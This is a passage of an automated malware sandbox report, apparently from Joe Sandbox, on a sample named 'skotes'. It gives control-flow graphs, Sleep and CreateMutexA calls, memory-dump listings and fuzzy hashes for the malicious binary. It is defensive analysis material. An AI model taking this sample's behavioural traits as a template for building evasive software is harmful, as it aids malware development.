                                                                                                                                            • Instruction Fuzzy Hash: BF3179317101088BFB18AB7CDD89FBDB7A2EB96314F20825DE019EB3D5D73599808752

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 56 aca079-aca099 60 aca09b-aca0a7 56->60 61 aca0c7-aca0e3 56->61 62 aca0bd-aca0c4 call add663 60->62 63 aca0a9-aca0b7 60->63 64 aca0e5-aca0f1 61->64 65 aca111-aca130 61->65 62->61 63->62 66 aca930 63->66 68 aca107-aca10e call add663 64->68 69 aca0f3-aca101 64->69 70 aca15e-aca916 call ad80c0 65->70 71 aca132-aca13e 65->71 74 aca953-aca994 Sleep CreateMutexA 66->74 75 aca930 call af6c6a 66->75 68->65 69->66 69->68 77 aca154-aca15b call add663 71->77 78 aca140-aca14e 71->78 86 aca996-aca998 74->86 87 aca9a7-aca9a8 74->87 75->74 77->70 78->66 78->77 86->87 88 aca99a-aca9a5 86->88 88->87
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000002.00000002.1728308904.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728325404.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728376892.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728393988.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728410983.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728425425.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728439924.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728575553.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728595566.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728667216.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728685793.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728703127.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728719428.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728735895.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728754853.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728777674.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728796035.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728812789.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728830374.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728846269.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728868946.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728890625.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728906468.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728921204.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728939078.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728957044.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728972482.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728987713.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729005543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729030587.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729045864.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729060101.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729074502.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729090986.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729108609.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729126776.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729143715.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729159536.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729215066.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729233401.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729248522.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729264251.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729278705.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729294677.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729311788.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: ce24a3dd309d2b6a1f34ac62ea6d6a2fab0122a81e94825b3cd372f2f9c4c6e4
                                                                                                                                            • Instruction ID: ff387fd1b7e347a18f9099cd337af594d470b09054bf97a7b26ebc4ae598cb93
                                                                                                                                            • Opcode Fuzzy Hash: ce24a3dd309d2b6a1f34ac62ea6d6a2fab0122a81e94825b3cd372f2f9c4c6e4
                                                                                                                                            • Instruction Fuzzy Hash: F3316831B101089BEB189B7CDD89FBCB7B2DBA1318F24835DE118A73D5C73699808752

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 90 aca1ae-aca1ce 94 aca1fc-aca218 90->94 95 aca1d0-aca1dc 90->95 96 aca21a-aca226 94->96 97 aca246-aca265 94->97 98 aca1de-aca1ec 95->98 99 aca1f2-aca1f9 call add663 95->99 101 aca23c-aca243 call add663 96->101 102 aca228-aca236 96->102 103 aca267-aca273 97->103 104 aca293-aca916 call ad80c0 97->104 98->99 105 aca935 98->105 99->94 101->97 102->101 102->105 110 aca289-aca290 call add663 103->110 111 aca275-aca283 103->111 107 aca953-aca994 Sleep CreateMutexA 105->107 108 aca935 call af6c6a 105->108 120 aca996-aca998 107->120 121 aca9a7-aca9a8 107->121 108->107 110->104 111->105 111->110 120->121 122 aca99a-aca9a5 120->122 122->121
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000002.00000002.1728308904.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728325404.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728376892.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728393988.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728410983.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728425425.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728439924.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728575553.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728595566.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728667216.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728685793.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728703127.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728719428.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728735895.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728754853.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728777674.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728796035.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728812789.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728830374.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728846269.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728868946.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728890625.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728906468.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728921204.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728939078.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728957044.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728972482.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728987713.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729005543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729030587.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729045864.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729060101.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729074502.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729090986.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729108609.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729126776.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729143715.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729159536.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729215066.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729233401.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729248522.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729264251.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729278705.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729294677.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729311788.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: a5af7ca64d14de47882111ecbc42ae56df62901404eec0e3956b2bf601e9a812
                                                                                                                                            • Instruction ID: 9c93d3802b0ed37cf6d9e4684a92cc6c0f89b9a8299b11dfef2bb28476b18b4c
                                                                                                                                            • Opcode Fuzzy Hash: a5af7ca64d14de47882111ecbc42ae56df62901404eec0e3956b2bf601e9a812
                                                                                                                                            • Instruction Fuzzy Hash: 24316A31B101089BFB089B7CDD89FBCB7B2EBA5318F24825DE014A73E1D73699808752

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 124 aca418-aca438 128 aca43a-aca446 124->128 129 aca466-aca482 124->129 132 aca45c-aca463 call add663 128->132 133 aca448-aca456 128->133 130 aca484-aca490 129->130 131 aca4b0-aca4cf 129->131 135 aca4a6-aca4ad call add663 130->135 136 aca492-aca4a0 130->136 137 aca4fd-aca916 call ad80c0 131->137 138 aca4d1-aca4dd 131->138 132->129 133->132 139 aca93f-aca994 call af6c6a * 4 Sleep CreateMutexA 133->139 135->131 136->135 136->139 143 aca4df-aca4ed 138->143 144 aca4f3-aca4fa call add663 138->144 160 aca996-aca998 139->160 161 aca9a7-aca9a8 139->161 143->139 143->144 144->137 160->161 162 aca99a-aca9a5 160->162 162->161
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000002.00000002.1728308904.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728325404.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728376892.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728393988.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728410983.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728425425.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728439924.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728575553.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728595566.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728667216.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728685793.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728703127.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728719428.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728735895.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728754853.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728777674.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728796035.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728812789.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728830374.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728846269.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728868946.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728890625.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728906468.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728921204.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728939078.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728957044.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728972482.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728987713.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729005543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729030587.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729045864.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729060101.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729074502.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729090986.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729108609.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729126776.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729143715.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729159536.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729215066.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729233401.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729248522.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729264251.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729278705.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729294677.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729311788.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: d40b7650f4a353c077f1e6839683ba8cbb389a34c7e879df3ca9411702f36053
                                                                                                                                            • Instruction ID: 5fd319cf6a36dbdae82023ef4e04f2d8ca79cb4e26803a6b5d2d611d15922261
                                                                                                                                            • Opcode Fuzzy Hash: d40b7650f4a353c077f1e6839683ba8cbb389a34c7e879df3ca9411702f36053
                                                                                                                                            • Instruction Fuzzy Hash: AB316C31B101088BEB0CABBCDE89FBDB761DFA1318F20825CE119973D5D77599808752

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 164 aca54d-aca56d 168 aca56f-aca57b 164->168 169 aca59b-aca5b7 164->169 170 aca57d-aca58b 168->170 171 aca591-aca598 call add663 168->171 172 aca5b9-aca5c5 169->172 173 aca5e5-aca604 169->173 170->171 174 aca944-aca994 call af6c6a * 3 Sleep CreateMutexA 170->174 171->169 176 aca5db-aca5e2 call add663 172->176 177 aca5c7-aca5d5 172->177 178 aca606-aca612 173->178 179 aca632-aca916 call ad80c0 173->179 198 aca996-aca998 174->198 199 aca9a7-aca9a8 174->199 176->173 177->174 177->176 184 aca628-aca62f call add663 178->184 185 aca614-aca622 178->185 184->179 185->174 185->184 198->199 200 aca99a-aca9a5 198->200 200->199
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000002.00000002.1728308904.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728325404.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728376892.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728393988.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728410983.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728425425.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728439924.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728575553.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728595566.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728667216.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728685793.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728703127.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728719428.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728735895.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728754853.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728777674.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728796035.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728812789.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728830374.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728846269.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728868946.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728890625.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728906468.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728921204.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728939078.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728957044.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728972482.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728987713.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729005543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729030587.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729045864.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729060101.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729074502.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
